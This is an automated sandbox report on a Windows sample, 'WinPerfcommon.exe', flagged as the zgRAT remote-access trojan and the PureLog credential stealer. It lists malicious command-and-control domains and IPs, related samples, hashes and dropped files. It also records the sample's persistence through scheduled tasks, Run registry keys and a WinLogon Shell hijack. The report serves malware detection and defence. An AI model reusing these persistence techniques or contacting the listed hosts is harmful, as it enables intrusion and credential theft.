http://fsin.top | pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003544000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000016.00000002.3291842516.0000020318590000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros- | powershell.exe, 00000018.00000002.3236041998.000001FAFDD60000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WinPerfcommon.exe, 00000000.00000002.1747143226.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003303000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003934000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micros | powershell.exe, 00000016.00000002.3285415906.0000020318470000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
37.44.238.250 | fsin.top | France | | 49434 | HARMONYHOSTING-ASFR | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589192
Start date and time: 2025-01-11 16:19:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 72
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: WinPerfcommon.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@67/71@1/1
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7100 because it is empty
• Execution Graph export aborted for target WinPerfcommon.exe, PID 6664 because it is empty
• Execution Graph export aborted for target pzPgKRlGoglDaRzDTBMXwbN.exe, PID 8004 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                Time | Type | Description
                                                                10:20:04 | API Interceptor | 191x Sleep call for process: powershell.exe modified
                                                                10:20:13 | API Interceptor | 1x Sleep call for process: pzPgKRlGoglDaRzDTBMXwbN.exe modified
                                                                15:20:02 | Task Scheduler | Run new task: pzPgKRlGoglDaRzDTBMXwbN path: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:02 | Task Scheduler | Run new task: pzPgKRlGoglDaRzDTBMXwbNp path: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:02 | Task Scheduler | Run new task: SgrmBroker path: "C:\Recovery\SgrmBroker.exe"
                                                                15:20:02 | Task Scheduler | Run new task: SgrmBrokerS path: "C:\Recovery\SgrmBroker.exe"
                                                                15:20:03 | Task Scheduler | Run new task: StartMenuExperienceHost path: "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:03 | Task Scheduler | Run new task: StartMenuExperienceHostS path: "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:03 | Task Scheduler | Run new task: SystemSettings path: "C:\Recovery\SystemSettings.exe"
                                                                15:20:03 | Task Scheduler | Run new task: SystemSettingsS path: "C:\Recovery\SystemSettings.exe"
                                                                15:20:03 | Task Scheduler | Run new task: WinPerfcommonW path: "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:06 | Task Scheduler | Run new task: WinPerfcommon path: "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:20:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:20:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
                                                                15:20:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:20:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:20:57 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:21:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:21:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
                                                                15:21:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:21:33 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:21:43 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run pzPgKRlGoglDaRzDTBMXwbN "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                15:21:53 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Recovery\SystemSettings.exe"
                                                                15:22:02 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Recovery\SgrmBroker.exe"
                                                                15:22:11 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinPerfcommon "C:\Users\user\Desktop\WinPerfcommon.exe"
                                                                15:22:28 | Autostart | Run: WinLogon Shell "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                15:22:37 | Autostart | Run: WinLogon Shell "C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                37.44.238.250 | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                                                 | PlZA6b48MW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 505905cm.n9shka.top/imagePollLinuxCentral.php
                                                                 | r6cRyCpdfS.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                                 | cbCjTbodwa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | whware.top/RequestLowGeoLongpollWordpress.php
                                                                 | vb8DOBZQ4X.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                                 | 8k1e14tjcx.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 703648cm.renyash.top/provider_cpugame.php
                                                                 | 4si9noTBNw.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                                 | Qsi7IgkrWa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                                 | 4Awb1u1GcJ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 143840cm.nyashteam.ru/DefaultPublic.php
                                                                 | s5duotgoYD.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                fsin.top | UuIspZT5b6.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 172.67.203.2
                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                HARMONYHOSTING-ASFR | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                 | PlZA6b48MW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                 | r6cRyCpdfS.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                 | cbCjTbodwa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                 | vb8DOBZQ4X.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                 | dlr.arm7.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                                 | dlr.mips.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                                 | dlr.mpsl.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                                 | dlr.arm6.elf | Get hash | malicious | Unknown | Browse | 37.44.238.94
                                                                 | 8k1e14tjcx.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                                No context
                                                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                C:\Users\user\Desktop\EAqnjiFq.log | Udzp7lL5ns.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | 7aHY4r6vXR.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | 0V2JsCrGUB.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | PlZA6b48MW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | wxl1r0lntg.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse |
                                                                 | Z90Z9bYzPa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | 0J5DzstGPi.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                 | HMhdtzxEHf.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (843), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):843
                                                                                    Entropy (8bit):5.911814602705079
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3iTc0b9gGbXhWTik7oonqMI0c6K4zVWtq3z06YG:3RGbsiiqAtKu3z0G
                                                                                    MD5:3E17C4172595A81892C25ABCAF75413C
                                                                                    SHA1:48C4D675D213DBBC238D0DC476B63F4F389BDD66
                                                                                    SHA-256:49D4664F9925E04728FA537F0B447E266D341E73806086B285F331B3C801ACFA
                                                                                    SHA-512:95169C4676C9CAF4A25959B00D0FD74D83412A95FAEFC5C838B238F48C9C0A4C4D6AEE015E14E5E17EB489E1803466E47CEDDFF20CC3141D29DC6DEFD9AAADDE
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (648), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):648
                                                                                    Entropy (8bit):5.8823572302145
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:/zo6Nie8lTX4rq2HtM3pPewgphDPS+Bgfawn98Um3hPLXrS+j4GTt7A6Nno2xhV3:/zluLmhM3pPIpdGD+Umh7XTJrloezC2l
                                                                                    MD5:5679B60603076DB66C8161CF4A52070B
                                                                                    SHA1:FBC8EE30991A639E72048A1EAC80BC1FFB53F6E8
                                                                                    SHA-256:3614F92D15DE57530F31A65E45123400E720D3D8D79AF486E7924144AC9930E1
                                                                                    SHA-512:AE6488796935CA0B4BB061FA1C3ED8F255E7126A72EC495325780C09C9CDD3EAEC6A4CFB89CD9C3538B434FED0F87F0D917688B7D3EB00662D6B0DEC65A65A0F
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (777), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):777
                                                                                    Entropy (8bit):5.900587876646576
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:ELHHH+lfgWbveqVD2Q2oSZ2whlqDrz9avUrtAam9ZYfr5th97MMBobECm7wR:aHn+dbxZGZx5XQD5XlMMBobmER
                                                                                    MD5:99D175C0AB03F540A82F7A1714AD0FE3
                                                                                    SHA1:FEF145B0C96EEC84FADFCCDDB05AB050A924B5FE
                                                                                    SHA-256:45D35EB0EF641497984908BCE84873EEA36DB4335DAD63A774CFAC2763444458
                                                                                    SHA-512:359DBEDADC0B91F00AECB696CB32047E8EC57DE40C8C4E432E93B96C6CAFECB143EFCDCA0B260129078AA36645E56EBC650C4F64A84FDA95D7BB22AB4F24BD03
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (700), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):700
                                                                                    Entropy (8bit):5.889564374008749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:rIJUHIXabNUnEeOqCDk3x7n6ut6bRRsIxMlLcBPLzGtxFSP55SYE2wpk41kaX5fk:rIJUHPeOqCDkB7ltMsIWszTPLTwK41kz
                                                                                    MD5:FAF16E369B73BE6F8517797A03B4B0E8
                                                                                    SHA1:67C4F16D601C8E38AAA2C5EC9796E49C409A65A4
                                                                                    SHA-256:63ACB774AE27BEB1741DE3EF8FCB541286D4E8248B277FDB3F8A7C437492B4CE
                                                                                    SHA-512:6E70E6D7A97E4BE7219BAC09299709312CF307B30769049C5119D49064F14056D15124EC62542659BD21FFF37CC72A16AC1E1197037D009E8356EACD9E2F5A4F
                                                                                    Malicious:false
                                                                                    Preview:JDMa2VfFHPFrufZhoUK3VC5vzDhgCvOL3IdCv8MZbXwSO5P9zzRJ8iVHHblyy9DVB4ymBWwpHuc8Qmg3yhqNeEMUwW5UXXlbTaRUHm8dClBNGW1f5rAQT016rdzobbRtIAozVLwLiNK2D8OZfZZqXUIdiUmoxTBlTRFGsBJt4ysFp83tPZJBBlWx1LQBjIYOMiiv3IrdQqvimDxka3YXJ9js4ROhuHJwad3HaIzHspuUzyLyXqlqtAFM800m3KtIh9HIJqKSDRpeOO2GGZJEgcDZYqIkRNNh6lx0qCorgSmcVk7t7ugdBomE5ruchkA0DHhmbCZDvciNzlExtYmhrtgS9s49SLJ6SwYODUS4UcsiGYOUn6tJ7dJUkPnsHavjSl5DMzuYGrMOB7LlejVVcA8ynDnxrjx4rIQecLIyMVCPQ4TmEBOhEaHSmHaJL6qg4Rh2rqJSbhIG7thsuBtqVP0QB72Vu9mQogU9Xa5X25GhRAU3jsYKMALpbQ1tyxic52cbZiUUGWxaIT8Am8vCkcDnVohGjLjEXnmZi3dBXEE0NvgIR1GzCf1czyGuAOu4xtCfqjbtfupgXNakIZysEtC1vJktxtAITJDdsBbsZXUR0VFlXgmkZC0DqLth9s6vtgNOJ61G7GTrZuBaE8VQHZtQS9xgR3sqajiUH0bbofnStJo6KTdBWpnUx66K
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2020864
Entropy (8bit): 7.570829238606583
Encrypted: false
SSDEEP: 49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
MD5: 6B9554367A439D39A00A0DFF9A08B123
